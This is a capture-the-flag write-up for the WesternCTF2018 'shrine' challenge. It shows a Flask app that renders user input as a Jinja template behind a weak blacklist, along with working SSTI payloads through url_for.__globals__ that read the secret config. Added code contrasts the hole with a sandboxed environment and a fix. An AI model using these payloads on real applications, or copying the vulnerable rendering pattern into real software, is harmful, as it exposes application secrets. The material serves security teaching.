[WesternCTF2018]shrine
2022-07-29 00:56:00 【pakho_C】
Flask framework

The challenge source (served verbatim by the `/` route):

```python
import flask
import os

app = flask.Flask(__name__)

# The flag is read from the environment and kept only in app.config['FLAG']
app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/')
def index():
    return open(__file__).read()


@app.route('/shrine/<path:shrine>')
def shrine(shrine):
    def safe_jinja(s):
        # Strip parentheses, then shadow the blacklisted names with None
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
    # User input is rendered directly as the template
    return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
    app.run(debug=True)
```
os.environ.pop('FLAG') reads the environment variable and stores it in the config entry named FLAG.
So the goal is to read the value out of config.
Since this is a Flask app, the first thing to consider is server-side template injection (SSTI).
Testing:

The blacklist blocks two names: config and self.
However, there are still some built-in functions available in the template, such as url_for and get_flashed_messages.
Testing with url_for:
shrine/{{url_for.__globals__}}

It executes; now view the configuration of current_app:
shrine/{{url_for.__globals__['current_app'].config}}
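To show why the blacklist fails and what actually closes the hole, here is an added example (not the challenge's code or the author's) that reproduces safe_jinja and renders it three ways: as the challenge does, inside Jinja2's SandboxedEnvironment, and with the user value passed as data instead of as the template. It assumes only the jinja2 package (the engine Flask uses); Flask is not required. CONFIG and some_helper are constructed stand-ins for app.config and for a context function such as url_for, and the flag value is a placeholder.

```python
# Added example, not the challenge's code: the shrine blacklist next to two
# defensive alternatives.  Assumes only the jinja2 package; Flask is not needed.
# CONFIG and some_helper are constructed stand-ins for app.config and for a
# context function such as url_for.
from jinja2 import Environment
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

# Constructed stand-in for app.config; the value is a placeholder, not a real flag.
CONFIG = {"FLAG": "flag{placeholder}"}


def some_helper():
    """Any plain function exposed to a template carries its module's globals in
    __globals__, exactly as url_for does inside Flask.  Here those globals
    include CONFIG, so shadowing the *name* config protects nothing."""
    return None


def safe_jinja(s):
    """The challenge's filter, reproduced unchanged: strip parentheses and
    shadow the two blacklisted names with None before rendering."""
    s = s.replace('(', '').replace(')', '')
    blacklist = ['config', 'self']
    return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s


def render_vulnerable(user_input):
    """The challenge's pattern: the user string *is* the template.  The
    blacklist hides the name `config`, but not the object behind it."""
    env = Environment()
    template = env.from_string(safe_jinja(user_input))
    return template.render(config=CONFIG, helper=some_helper)


def render_sandboxed(user_input):
    """Same (still wrong) pattern inside Jinja2's SandboxedEnvironment, which
    refuses attribute access to names beginning with an underscore, so
    reaching __globals__ raises SecurityError instead of returning the dict."""
    env = SandboxedEnvironment()
    try:
        template = env.from_string(safe_jinja(user_input))
        return template.render(config=CONFIG, helper=some_helper)
    except SecurityError:
        return "blocked"


def render_fixed(user_input):
    """The actual fix: the template is a constant written by the developer and
    the user value is passed in as data, so it is never parsed as Jinja syntax."""
    env = Environment(autoescape=True)
    return env.from_string("Shrine of {{ name }}").render(name=user_input)


if __name__ == "__main__":
    probe = "{{helper.__globals__['CONFIG']['FLAG']}}"
    print("vulnerable:", render_vulnerable("{{config}}"), "/", render_vulnerable(probe))
    print("sandboxed: ", render_sandboxed(probe))
    print("fixed:     ", render_fixed(probe))
```

The sandbox is defence in depth only: it stops the `__globals__` walk, but render_fixed is the real remedy, because a name blacklist can never enumerate every path from a harmless-looking context object back to the application's config.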
